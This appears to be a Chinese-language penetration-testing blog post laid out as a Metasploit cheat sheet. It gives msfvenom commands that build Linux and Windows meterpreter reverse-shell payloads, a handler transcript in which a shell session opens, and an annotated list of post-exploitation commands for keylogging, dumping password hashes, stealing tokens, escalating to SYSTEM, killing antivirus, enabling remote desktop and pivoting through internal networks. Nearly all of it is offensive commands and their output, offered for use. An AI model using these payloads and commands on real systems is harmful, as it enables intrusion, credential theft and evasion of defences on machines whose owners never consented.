August 16, 2020 WEB渗透测试 访问: 66 次


exploit -j -z#-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
sessions -l # (查看会话)
sessions -i 2  # 选择会话
sessions -k 2  # 结束会话
ctrl+z #back 会话



MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe

    -l, --list            <type>     List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
    -p, --payload         <payload>  Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
        --list-options               List --payload <value>'s standard, advanced and evasion options
    -f, --format          <format>   Output format (use --list formats to list)
    -e, --encoder         <encoder>  The encoder to use (use --list encoders to list)
        --sec-name        <value>    The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
        --smallest                   Generate the smallest possible payload using all available encoders
        --encrypt         <value>    The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
        --encrypt-key     <value>    A key to be used for --encrypt
        --encrypt-iv      <value>    An initialization vector for --encrypt
    -a, --arch            <arch>     The architecture to use for --payload and --encoders (use --list archs to list)
        --platform        <platform> The platform for --payload (use --list platforms to list)
    -o, --out             <path>     Save the payload to a file
    -b, --bad-chars       <list>     Characters to avoid example: '\x00\xff'
    -n, --nopsled         <length>   Prepend a nopsled of [length] size on to the payload
        --pad-nops                   Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
    -s, --space           <length>   The maximum size of the resulting payload
        --encoder-space   <length>   The maximum size of the encoded payload (defaults to the -s value)
    -i, --iterations      <count>    The number of times to encode the payload
    -c, --add-code        <path>     Specify an additional win32 shellcode file to include
    -x, --template        <path>     Specify a custom executable file to use as a template
    -k, --keep                       Preserve the --template behaviour and inject the payload as a new thread
    -v, --var-name        <value>    Specify a custom variable name to use for certain output formats
    -t, --timeout         <second>   The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
    -h, --help                       Show this message

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=10001 -f elf > shell.elf


msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf5 exploit(multi/handler) > set LHOST
msf5 exploit(multi/handler) > set LPORT 10001
LPORT => 10001
msf5 exploit(multi/handler) > exploit


msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 
[*] Sending stage (38 bytes) to
[*] Command shell session 1 opened ( -> at 2020-08-16 14:08:19 +0800



msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=10001 -f exe > shell.exe



root@Kali:~# msfconsole 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: could not connect to server: Connection refused
        Is the server running on host "localhost" (::1) and accepting
        TCP/IP connections on port 5432?
could not connect to server: Connection refused
        Is the server running on host "localhost" ( and accepting
        TCP/IP connections on port 5432?


service postgresql start

初始化Metasploit数据库:msfdb init


set payload windows/x64/meterpreter_reverse_tcp
msf5 > msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST= LPORT=10001 -f exe > shell.exe


meterpreter > background  放回后台
meterpreter > exit  关闭会话
meterpreter > help  帮助信息
meterpreter > Sysinfo系统平台信息
meterpreter > screenshot  屏幕截取
meterpreter > shell  命令行shell (exit退出)
meterpreter > getlwd  查看本地目录
meterpreter > lcd  切换本地目录
meterpreter > getwd  查看目录
meterpreter > ls 查看文件目录列表
meterpreter > cd  切换目录 
meterpreter > rm  删除文件 
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe  上传文件
meterpreter > search -d c:  -f *.doc  搜索文件
meterpreter > execute -f  cmd.exe -i   执行程序/命令 
meterpreter > ps  查看进程
meterpreter > run post/windows/capture/keylog_recorder   键盘记录
meterpreter > getuid  查看当前用户权限
meterpreter > use priv  加载特权模块
meterpreter > getsystem  提升到SYSTEM权限
meterpreter > hashdump  导出密码散列
meterpreter > ps   查看高权限用户PID
meterpreter > steal_token <PID>  窃取令牌
meterpreter > rev2self  恢复原来的令牌 
meterpreter > migrate pid  迁移进程
meterpreter > run killav  关闭杀毒软件 
meterpreter > run getgui-e  启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP>  端口转发
meterpreter > run get_local_subnets  获取内网网段信息
meterpreter > run autoroute -s <内网网段>  创建自动路由
meterpreter > run autoroute -p  查看自动路由表
msf > use auxiliary/server/socks4a   设置socks4代理模块
msf auxiliary(socks4a) > show options 
msf auxiliary(socks4a) > run
nano /etc/proxychains.conf   修改代理监听端口,和前面端口一致
quite_mode  设置成安静模式:去掉如下参数前面的注释